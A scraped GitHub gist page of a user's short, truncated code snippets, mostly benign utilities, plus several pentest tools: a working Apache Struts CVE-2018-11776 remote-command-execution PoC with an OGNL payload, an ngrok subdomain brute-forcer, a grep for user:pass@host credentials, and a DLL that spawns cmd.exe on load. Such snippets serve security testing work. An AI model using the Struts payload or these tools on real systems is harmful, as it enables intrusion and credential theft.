atucom
/ gist:ff6cecf38ac999c9223187a7cae55c41
Created
January 29, 2019 20:10
List EC2 and Lightsail boxes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| List lightsail boxes: | |
| alias aws_lightsail_list='aws lightsail get-instances --query="instances[*].{Name:name, IP:publicIpAddress, Username:username, State:state.name, key:sshKeyName}" --output=table' | |
| List ec2 boxes: | |
| alias aws_ec2_list='aws ec2 describe-instances --query="Reservations[*].Instances[*].{Launched:LaunchTime, State:State.Name, Key:KeyName, IP:PublicIpAddress, Tags:Tags[0].Value, Region:Placement.AvailabilityZone}" --output=table' |
atucom
/ gist:179afbe6be6d47fa05debc61eb77abce
Created
March 13, 2019 16:26
grep for user:pass@example.com patterns
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # user : pass @ whatever | |
| grep -Pi '[^\s]*:[^\s]*@[^\s]*' * --color |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| #brute ngrok's subdomain pattern | |
| import requests | |
| import itertools | |
| for sub in itertools.product("0123456789abcdef", repeat=8): | |
| host = "".join(sub) + ".ngrok.io" | |
| print(host) | |
| reply = requests.get("http://18.188.14.65", headers={"Host": host}) | |
| if "Tunnel " + host + " not found" not in reply.text: |
atucom
/ CVE-2018-11776-PoC.py
Last active
July 16, 2019 01:46
Simple PoC for the Apache Struts vuln CVE-2018-11776
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| # Simple PoC for the Apache Struts vuln CVE-2018-11776 | |
| # this currently works on the struts showcase app but can easily be adapted to anything | |
| # Thanks to https://github.com/jas502n/St2-057 for working OGNL statements :D (proper URL encoding REALLY matters) | |
| # @atucom | |
| def runCMD(command): | |
| target = 'http://192.168.235.181:8080/struts3-showcase/' | |
| payload = '%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27' + command + '%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action' | |
| return requests.get(target + payload).text |
atucom
/ gist:b4adc9cae195e4a6ac5b2ee86386c51c
Created
January 15, 2020 21:52
Solution to Cryptopals Challenge 4
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import langdetect | |
| from langdetect import detect | |
| def ascii_hex_to_bytes(hex_input): | |
| return bytearray.fromhex(hex_input) | |
| with open('Downloads/cryptopals-challenge4.txt') as f: | |
| xorinput=f.readlines() | |
| xor2 = [line.strip() for line in xorinput] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from selenium import webdriver | |
| import argparse | |
| import re | |
| from time import sleep | |
| def get_links(url): | |
| options = webdriver.ChromeOptions() | |
| options.add_argument('--ignore-certificate-errors') |
atucom
/ sleepPipe.py
Created
February 18, 2020 18:13
Holds onto stdin for specified number of seconds (or default 2) and then pipes to stdout.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # takes stdin, sleeps, outputs to stdout | |
| import sys | |
| import time | |
| def main(): | |
| if len(sys.argv) > 1: | |
| sleep_time = int(sys.argv[1]) | |
| else: | |
| sleep_time = 2 |
atucom
/ PopCMD.dll.cpp
Created
February 26, 2020 21:55
Simple CPP code to pop a CMD shell upon loading a DLL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dllmain.cpp : Defines the entry point for the DLL application. | |
| #include "pch.h" | |
| #include <stdlib.h> | |
| BOOL APIENTRY DllMain( HMODULE hModule, | |
| DWORD ul_reason_for_call, | |
| LPVOID lpReserved | |
| ) | |
| { | |
| system("cmd.exe"); |
atucom
/ covid-checker.py
Created
March 5, 2020 01:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # crappy script to check colorado's covid tracking site. Run once per day via cron or cloudwatch/lambda | |
| import bs4 | |
| import requests | |
| def check_co_gov_site(): | |
| url = 'https://www.colorado.gov/pacific/cdphe/2019-novel-coronavirus' | |
| reply = requests.get(url) | |
| soup = bs4.BeautifulSoup(reply.text, features='html.parser') |
atucom
/ verbose_decorator.py
Created
July 15, 2020 21:41
Debugging decorator to output function and args
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def verbose(func): | |
| def output_args(*args, **kwargs): | |
| print("Called {} with: {}".format(func.__name__, [args, kwargs])) | |
| func(*args, **kwargs) | |
| return output_args | |
| @verbose | |
| def say_thing(thing): | |
| print(thing) |